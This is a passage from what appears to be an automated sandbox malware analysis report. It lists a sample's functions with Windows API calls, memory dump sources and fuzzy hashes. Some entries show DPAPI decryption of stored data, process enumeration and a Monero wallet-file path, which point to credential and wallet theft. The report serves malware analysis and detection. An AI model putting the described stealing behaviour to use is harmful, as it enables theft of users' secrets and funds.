                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 4.4_$Xe_g$d(qz$h`s$%<$%<
                                        • API String ID: 0-3551009197
                                        • Opcode ID: f8288d59cb15555dd0a54fd3dfaf7042c9a88984b4facd2b563091ad25038203
                                        • Instruction ID: 3a0b0b510db5d99f43be62a25f9c396791c40c7679f472aba41fac1077b661a5
                                        • Opcode Fuzzy Hash: f8288d59cb15555dd0a54fd3dfaf7042c9a88984b4facd2b563091ad25038203
                                        • Instruction Fuzzy Hash: 06A216F3A0C6009FE3046F2DEC8567AFBE5EB94720F1A493DEAC583744EA3558148697
                                        Function 00CE4A7C Relevance: 7.9, Strings: 5, Instructions: 1638COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $eo{$>I{$O|# $^^<{$p8d-
                                        • API String ID: 0-3499946249
                                        • Opcode ID: 4a79b1550fa5176904912c824d15bbead1068b8b48fef09e53e070b96adb8002
                                        • Instruction ID: b42372d07d84eee03b40e81fe18cb41e1c64fa2386e7b8137d3398e958a36afd
                                        • Opcode Fuzzy Hash: 4a79b1550fa5176904912c824d15bbead1068b8b48fef09e53e070b96adb8002
                                        • Instruction Fuzzy Hash: 00B2F6F3A08204AFE3046E2DEC8567AF7E9EFD4720F1A893DE6C4C3744E63558458696
                                        Function 00CD8EAF Relevance: 7.8, Strings: 5, Instructions: 1571COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: /:]M$1!CW$Dunb$E><$QO_
                                        • API String ID: 0-2932961135
                                        • Opcode ID: 3156d0774e1ea32d8f798192c35b2855123ebbafa1ddb36a0eb75ea52f0adcbb
                                        • Instruction ID: c39a7886cdf8863727b555e930d9b12dbb3a1e0a79cf476f5fb3175d59c7ea59
                                        • Opcode Fuzzy Hash: 3156d0774e1ea32d8f798192c35b2855123ebbafa1ddb36a0eb75ea52f0adcbb
                                        • Instruction Fuzzy Hash: 53B2E4F360C2009FE7046F29EC8567AFBE9EF94720F1A492DEAC4D3740E67598418697
                                        Function 0091C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0091C871
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0091C87C
                                        • lstrcat.KERNEL32(?,00930B46), ref: 0091C943
                                        • lstrcat.KERNEL32(?,00930B47), ref: 0091C957
                                        • lstrcat.KERNEL32(?,00930B4E), ref: 0091C978
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        • Opcode ID: 1d83dfedbfe268e73c0676cc13932d563ff756c59b181c9f87bb7fc7d15c5d0f
                                        • Instruction ID: ce0c2a9139b248050152118aee5ee5d791d9d81736495958356c13074748f3b9
                                        • Opcode Fuzzy Hash: 1d83dfedbfe268e73c0676cc13932d563ff756c59b181c9f87bb7fc7d15c5d0f
                                        • Instruction Fuzzy Hash: 08415EB590431EDFDB10DF90DD89BEEB7B8AB88305F1046A8E509A7280DB745A84CF91
                                        Function 00917240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0091724D
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00917254
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00917281
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009172A4
                                        • LocalFree.KERNEL32(?), ref: 009172AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: a6d86ff7ac61dc19d05a4b04a167a484cfb034d701dea96c7181bd86e9d784af
                                        • Instruction ID: c43a6492e15a3e80da8b8ca15701730d179a3ec2890ea7e48b067b63fcb44b2a
                                        • Opcode Fuzzy Hash: a6d86ff7ac61dc19d05a4b04a167a484cfb034d701dea96c7181bd86e9d784af
                                        • Instruction Fuzzy Hash: 10010075B40308BBDB10DBD4CD45F9D77B8AB44701F104594FB15BB2C0DA70AA018B65
                                        Function 00929600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0092961E
                                        • Process32First.KERNEL32(00930ACA,00000128), ref: 00929632
                                        • Process32Next.KERNEL32(00930ACA,00000128), ref: 00929647
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 0092965C
                                        • CloseHandle.KERNEL32(00930ACA), ref: 0092967A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 61912aa855ab2f452080db22146c88ab8c1f972442d5e261a777cc3ad2b54a95
                                        • Instruction ID: 5a83d954aa12e78b864d5d479f8aa8f2f27aa0fe2de8ffab9d59ecc51205e9e3
                                        • Opcode Fuzzy Hash: 61912aa855ab2f452080db22146c88ab8c1f972442d5e261a777cc3ad2b54a95
                                        • Instruction Fuzzy Hash: 9B010C75A00318ABCB14DFA5DD58BEDBBF8FB48701F1042C8A909A7240DB349B44CF51
                                        Function 00CD753A Relevance: 6.6, Strings: 4, Instructions: 1585COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ?}z$H{y$4]6$X_w
                                        • API String ID: 0-2590440464
                                        • Opcode ID: b3034f3f63615e8ab247431f24309533378c86aa40e91d2b7b6f649c785cc4fa
                                        • Instruction ID: 7c65876b12780624e58ae62e0ad59edf73cd28a3aeafe2b5eb54f4ce5e4c49e7
                                        • Opcode Fuzzy Hash: b3034f3f63615e8ab247431f24309533378c86aa40e91d2b7b6f649c785cc4fa
                                        • Instruction Fuzzy Hash: 01B2F8F360C6009FE304AE2DEC8567ABBE9EF98320F16493DE6C4C7744E63598458796
                                        Function 00CDFC24 Relevance: 6.3, Strings: 4, Instructions: 1315COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 9.!,$F&w$JU_z$i ?z
                                        • API String ID: 0-929253275
                                        • Opcode ID: 5461a4d79aeb11a7a5f060bc9f960e668600a8f3b5669e0e2b3abe43c33f8a56
                                        • Instruction ID: f57a3ef090fbedac8f1cd40b58d5a241edc4adc602e59f9539caa13aba7645d4
                                        • Opcode Fuzzy Hash: 5461a4d79aeb11a7a5f060bc9f960e668600a8f3b5669e0e2b3abe43c33f8a56
                                        • Instruction Fuzzy Hash: 6B9218F3A0C2049FE3086F2DEC8567AB7E9EF94720F1A493DE6C4C7740EA7558418696
                                        Function 00928680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009305B7), ref: 009286CA
                                        • Process32First.KERNEL32(?,00000128), ref: 009286DE
                                        • Process32Next.KERNEL32(?,00000128), ref: 009286F3
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • CloseHandle.KERNEL32(?), ref: 00928761
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: a29ab664b19ee4e924ad400010b24eab97ac309dd334a159d7aeeda2e5aaecd4
                                        • Instruction ID: 3662cea85cc95627562d292a03bed5972a0cf361349533582b7425140ebe3fe9
                                        • Opcode Fuzzy Hash: a29ab664b19ee4e924ad400010b24eab97ac309dd334a159d7aeeda2e5aaecd4
                                        • Instruction Fuzzy Hash: 2A315E72901228ABCB24DB51EC51FEEB77CEB88700F104199E509A21A4DF346A45CFA1
                                        Function 00928EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,00915184,40000001,00000000,00000000,?,00915184), ref: 00928EC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: 9b5b055b83eef97ec5c2c1e82d11444f83e1e28347cb7545af061b22d41260d2
                                        • Instruction ID: a411cdbb33008e5cfee63dc8b0b1c76198009216bc8c7b68794b326fd0055efb
                                        • Opcode Fuzzy Hash: 9b5b055b83eef97ec5c2c1e82d11444f83e1e28347cb7545af061b22d41260d2
                                        • Instruction Fuzzy Hash: 92112A74201208FFEB00DF64EC84FAB37A9AF89301F109948F9198B258DB35EC41DBA0
                                        Function 00919AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919AEF
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00914EEE,00000000,?), ref: 00919B01
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919B2A
                                        • LocalFree.KERNEL32(?,?,?,?,00914EEE,00000000,?), ref: 00919B3F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID:
                                        • API String ID: 4291131564-0
                                        • Opcode ID: a067fb232765fb6f9290ada621344afd2075404e531420f008841e464bcfd0e1
                                        • Instruction ID: 535c3fa4fe0850cc4c1f2e5a69a965aae4bf55ec899c6adbc605576249451ea2
                                        • Opcode Fuzzy Hash: a067fb232765fb6f9290ada621344afd2075404e531420f008841e464bcfd0e1
                                        • Instruction Fuzzy Hash: 4511A4B4240308AFEB11CF64DC95FAA77B9FB89701F208199F9159B390C775A941CB50
                                        Function 00927980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00930E00,00000000,?), ref: 009279B0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009279B7
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00930E00,00000000,?), ref: 009279C4
                                        • wsprintfA.USER32 ref: 009279F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
